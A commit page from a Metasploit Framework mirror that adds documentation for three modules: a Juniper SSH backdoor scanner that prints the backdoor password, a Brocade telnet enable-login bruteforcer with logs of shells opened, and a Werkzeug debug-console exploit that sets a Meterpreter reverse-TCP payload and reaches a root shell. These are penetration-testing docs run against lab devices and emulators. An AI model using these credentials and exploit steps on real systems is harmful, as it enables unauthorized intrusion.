infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

adding docs for #4888 #5697 #6731

bug/bundler_fix
h00die 2016-07-29 23:11:57 -04:00
parent 8bda3c6382
commit 38138e66d2
3 changed files with 347 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md Normal file
View File

@ -0,0 +1,33 @@
## Vulnerable Application
Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
4. Do: `set rhosts`
5. Do: `run`
6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
## Scenarios
Example run against a Juniper SSG5 with vuln firmware from above link.
```
msf > use auxiliary/scanner/ssh/juniper_backdoor
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(juniper_backdoor) > set verbose true
verbose => true
msf auxiliary(juniper_backdoor) > run
[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

242
documentation/modules/auxiliary/scanner/telnet/brocade_enable_login.md Normal file
View File

@ -0,0 +1,242 @@
## Vulnerable Application
This module is a login bruteforcer against Brocade network device's `enable` feature.
To configure the device in a vulnerable fashion, follow these steps:
1. Set authentication mode via: `aaa authentication enable default local`
This module works against `enable` so we want to ensure telnet itself has no auth
**The following should not be set**: `enable telnet authentication`
This module has been verified against:
1. ICX6450-24 SWver 07.4.00bT311
2. FastIron WS 624 SWver 07.2.02fT7e1
An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
## Verification Steps
1. Install the emulator or device
2. Start msfconsole
3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
4. Create/set a password file: `set pass_file /<passwords.lst>`
5. If desired: `set user_as_pass true`
6. Do: `set rhosts <ip>`
7. Do: `run`
8. You should get a shell.
## Scenarios
Example run against ICX6450-24 SWver 07.4.00bT311
```
msf > use auxiliary/scanner/telnet/brocade_enable_login
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
pass_file => /passwords.lst
msf auxiliary(brocade_enable_login) > set user_as_pass true
user_as_pass => true
msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
rhosts => 192.168.50.1
msf auxiliary(brocade_enable_login) > run
[*] Attempting username gathering from config on 192.168.50.1
[*] Found: admin@192.168.50.1
[*] Found: read@192.168.50.1
[*] Found: port@192.168.50.1
[*] Attempting username gathering from running-config on 192.168.50.1
[*] Found: admin@192.168.50.1
[*] Found: read@192.168.50.1
[*] Found: port@192.168.50.1
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
[*] Attempting to start session 192.168.50.1:23 with admin:admin
[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
[*] Attempting to start session 192.168.50.1:23 with read:read
[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
[*] Attempting to start session 192.168.50.1:23 with port:port
[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(brocade_enable_login) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell TELNET admin:admin (192.168.50.1:23) 192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
2 shell TELNET read:read (192.168.50.1:23) 192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
3 shell TELNET port:port (192.168.50.1:23) 192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
msf auxiliary(brocade_enable_login) > session -i 1
[-] Unknown command: session.
msf auxiliary(brocade_enable_login) > sessions -i 1
[*] Starting interaction with 1...
show sessions ?
Unrecognized command
BR-telnet@FWS624 Router#show ?
802-1w Rapid Spanning tree IEEE 802.1w D10 status
aaa Show TACACS+ and RADIUS server statistics
access-list show IPv4 access-list information
acl-on-arp Show ARP ACL filtering
arp Arp table
auth-mac-addresses MAC Authentication status
batch Batch commands
boot-preference System boot preference
buffer-profile Displays active profile
cable-diagnostics Show Cable Diagnostics
chassis Power supply/fan/temperature
clock System time and date
configuration Configuration data in startup config file
cpu-utilization CPU utilization rate
debug Debug information
default System default settings
dot1x Dot1x information
errdisable Errdisable status
fdp CDP/FDP information
flash Flash memory contents
gvrp GVRP information
inline inline power information
interfaces Port status
--More--, next page: Space, next line: Return key, quit: Control-c
ip IP address setting
ipv6 IP setting
license Show license information
link-aggregate 802.3ad Link Aggregation Information
link-error-disable Link Debouncing Control
link-keepalive Link Layer Keepalive
lldp Link-Layer Discovery Protocol information
local-userdb Local User Database information
logging System log
loop-detection loop detection status & disabled ports
mac-address MAC address table
media 1Gig/10G port media type
memory System memory usage
metro-ring Metro ring protocol information
mirror Mirror ports
module Module type and status
monitor Monitor ports
mstp show MSTP (IEEE 802.1s) information
optic Optic Temperature and Power
port Show port security
priority-mapping 802.1Q tagged priority setting
processes Active process statistics
protected-link-group Show Protected Link Group Details
--More--, next page: Space, next line: Return key, quit: Control-c
ptrace Global ptrace information
qd-buffer-profile User configured buffer/descriptor profiles
qos-profiles QOS configuration
qos-tos IPv4 ToS based QoS
radius show radius server debug info
rate-limit Rate-limiting table and actions
redundancy Display management redundancy details
relative-utilization Relative utilization list
reload Scheduled system reset
reserved-vlan-map Reserved VLAN map status
rmon Rmon status
running-config Current running-config
scheduler-profile User configured scheduling profiles
sflow sFlow information
snmp SNMP statistics
sntp Show SNTP
span Spanning tree status
statistics Packet statistics
stp-bpdu-guard BPDU Guard status
stp-group Spanning Tree Group Membership
stp-protect-ports Show stp-protect enabled ports and their BPDU drop
counters
table-mac-vlan MAC Based VLAN status
--More--, next page: Space, next line: Return key, quit: Control-c
tech-support System snap shot for tech support
telnet Telnet connection
topology-group Topology Group Membership
traffic-policy Show traffic policy definition
trunk Show trunk status
users User accounts
v6-l4-acl-sessions Show IPv6 software sessions
version System status
vlan VLAN status
vlan-group VLAN Group Membership
voice-vlan Show voice vlan
vsrp Show VSRP commands
web-connection Current web connections
webauth web authentication information
who User login
| Output modifiers
<cr>
BR-telnet@FWS624 Router#
```
Example run against emulator mentioned above:
```
msf > use auxiliary/scanner/telnet/brocade_enable_login
msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(brocade_enable_login) > set user_as_pass true
user_as_pass => true
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
pass_file => /passwords.lst
msf auxiliary(brocade_enable_login) > run
[*] Attempting username gathering from config on 127.0.0.1
[*] Found: username@127.0.0.1
[*] Found: ttrogdon@127.0.0.1
[*] Found: dmudd@127.0.0.1
[*] Attempting username gathering from running-config on 127.0.0.1
[*] Found: TopDogUser@127.0.0.1
[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
[*] Attempting to start session 127.0.0.1:23 with username:password
[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(brocade_enable_login) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell TELNET username:password (127.0.0.1:23) 127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
2 shell TELNET ttrogdon:ttrogdon (127.0.0.1:23) 127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
msf auxiliary(brocade_enable_login) >
```

72
documentation/modules/exploit/multi/http/werkzeug_debug_rce.md Normal file
View File

@ -0,0 +1,72 @@
## Vulnerable Application
Verified against:
+ 0.9.6 on Debian
+ 0.9.6 on Centos
+ 0.10 on Debian
A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/werkzeug_debug_rce`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `check`
```
[+] 10.108.106.201:8081 - The target is vulnerable.
```
7. Do: `set payload python/meterpreter/reverse_tcp`
8. Do: `set lhost <ip>`
9. Do: `exploit`
10. You should get a shell.
## Options
**TARGETURI**
TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
## Scenarios
Example utilizing the previously mentioned sample app listed above.
```
msf > use exploit/multi/http/werkzeug_debug_rce
msf exploit(werkzeug_debug_rce) > set rport 8081
rport => 8081
msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
rhost => 10.108.106.201
msf exploit(werkzeug_debug_rce) > check
[+] 10.108.106.201:8081 - The target is vulnerable.
msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
lhost => 10.108.106.121
msf exploit(werkzeug_debug_rce) > exploit
[*] Started reverse handler on 10.108.106.121:4444
[*] Sending stage (25277 bytes) to 10.108.106.201
[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
meterpreter > getpid
Current pid: 13034
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : werkzeug
OS : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
Architecture : x86_64
Meterpreter : python/python
meterpreter > shell
Process 13037 created.
Channel 0 created.
/bin/sh: 0: can't access tty; job control turned off
# ls
app.py app.pyc werkzeug
# exit
meterpreter > exit
[*] Shutting down Meterpreter...
```